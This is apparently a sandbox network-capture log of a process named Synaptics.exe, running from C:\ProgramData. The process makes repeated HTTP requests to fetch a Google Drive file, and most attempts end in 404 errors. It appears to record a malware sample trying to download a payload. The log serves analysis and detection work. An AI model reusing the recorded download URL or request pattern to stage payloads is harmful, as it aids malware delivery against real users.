2024-12-30 10:25:59 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6hjBmZTql2QpgMf36Z3m_jYTUCj-P6RTCIY_t8n8ZRm8Thm3VIi-SA-S6EEokzVAUHufF0yIc
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:59 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-69ejyhKWHaU-IZFje0txeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:25:59 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:59 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="zn-5rZ20nbdwv1KhB6Mixw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:59 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.9 | 49894 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:59 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-8FXmXrLafec2uBBIl1CNeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.9 | 49893 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:59 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-20Ps8rXYBV0JyvYzrJshSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    113 | 192.168.2.9 | 49895 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:00 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC43wxTFGryaZ44jby1-dov6rtF4nw6NYS6O-AiUe-a2QUqaoZnI4E10zci_AhnpHoMn
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Sptt28XtNp1l3jR_vTbVHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:00 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:00 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="hwbn3P0YQ6FtQQO5bbpZSQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:00 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    114 | 192.168.2.9 | 49896 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:00 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:00 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7QXvsmAJN7IHVDbK0q8d866LU_NSSUkIZU7HZYG8bX2qI0DBTMGDvms3zRPOYTeF92-1ZS54Q
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:00 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0Mv845j50wSf1CKQUkxzlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:00 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:00 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="RK78PrU10HUbGE75wqiIiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:00 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    115 | 192.168.2.9 | 49898 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:00 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:01 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d_N0LIlV09Xh66wmkOTWLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    116 | 192.168.2.9 | 49899 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:00 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:01 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:01 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CJTuZL-YZ09pftQwCVmGLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    117 | 192.168.2.9 | 49901 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:01 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    118 | 192.168.2.9 | 49902 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:01 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    119 | 192.168.2.9 | 49909 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:02 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6_3v9E3Uv6PltVdxHDqNY53sZ_h9UjqMFqSjVOYSwlSsolWaBAuQnxZfpHCvkqJeBj
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9_dYsm2cApJwMtu1Pcs3FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:02 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:02 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="nAmHgmeW0LnsgMpYlKd3pA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:02 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    120 | 192.168.2.9 | 49907 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:02 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uQ5pjlH4Zm__sDoUvGsTRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    121 | 192.168.2.9 | 49908 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:02 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5fgCE-izE8UJ3wqfSLfseAa0hRGqbhEua142We6KsOT-ahhgMeNgyrSZSzp4-V_-Xa
